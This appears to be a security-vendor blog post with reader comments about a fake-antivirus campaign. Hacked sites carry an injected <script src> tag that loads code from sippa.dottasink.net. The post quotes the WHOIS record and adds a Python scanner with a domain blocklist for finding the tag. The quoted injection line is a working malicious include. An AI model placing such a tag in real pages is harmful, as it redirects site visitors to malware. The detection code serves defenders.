Hilary Kneber (part XI) – sippa.dottasink.net

Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:

<script src="http://sippa.dottasink.net/music/indi.php"></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

$ whois dottasink.net
..
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Yes, the same group behind “vancouvererrorsonfile”, “whereisdudescars” and various other attacks (losotrana.com, zettapetta.com, etc.).

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.
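
A defender-side check for the injected tag described above, as an added example that is not part of the original post and is not Sucuri's cleanup script: it parses each file, extracts every `<script src>` host and flags hosts at or under `dottasink.net`. The function names, the file extensions scanned and the sample page are assumptions made for this example.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlsplit

BAD_DOMAINS = {"dottasink.net"}  # indicator from this post; extend as needed

class ScriptSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []  # src value of every <script> start tag seen

    def handle_starttag(self, tag, attrs):
        if tag == "script" and dict(attrs).get("src"):
            self.sources.append(dict(attrs)["src"].strip())

def is_bad_host(host, bad_domains=BAD_DOMAINS):
    """True for a listed domain or any subdomain of it, never a look-alike."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in bad_domains)

def find_injected_scripts(html, bad_domains=BAD_DOMAINS):
    """Return script src URLs in `html` whose host is on the blocklist."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hits = []
    for src in parser.sources:
        try:
            host = urlsplit(src).hostname  # also handles //host/path
        except ValueError:                 # malformed URL: not a match
            continue
        if is_bad_host(host, bad_domains):
            hits.append(src)
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Map each matching file under `root` to the blocklisted URLs in it."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injected_scripts(fh.read())
            if hits:
                findings[path] = hits
    return findings

# Constructed sample page: one legitimate local script, one injected tag.
SAMPLE = ('<html><body><script src="/js/site.js"></script><script '
          'src="http://sippa.dottasink.net/music/indi.php"></script></body></html>')
```

Call `scan_tree()` on a copy of the web root; a hit only identifies the file carrying the tag, so the way the attacker wrote to that file still has to be found and closed.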


If your site is hacked, this script should clean it up: wordpress-fix.php, or contact us for a professional, hands-on clean-up (support@sucuri.net).

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Tom

    It seems that a lot of websites that are hosted by “bravenet” have been being “hacked”, recently.. you might want to look into that.. here are the details.. you do a Google search for “nema motor flange” and it will bring up results like “bobcooney.org/7EwOXldlQNd/”.. from what I have heard, all of these websites are used to redirect to “fakeav”-type webpages.. it seems that “bravenet” has been addressing some of the compromised websites but new ones keep popping up.. incidentally, it seemed to me that not all of the websites were legitimate websites that had been compromised, but that some of them were just bogus websites that were put up.. maybe I am wrong about that, but that was my impression.. many of them were registered by “privacyprotect” which is suspicious..

  • http://helldescent.com HellDescent

    My site just got hacked by a fake AV software malware. We have no clue what and where it's located, but it pops up once. It's a JavaScript. I have saved it, this is it. If anyone can help us, please email me at cj@helldescent.com. I will check back for comments.

    Evil script:

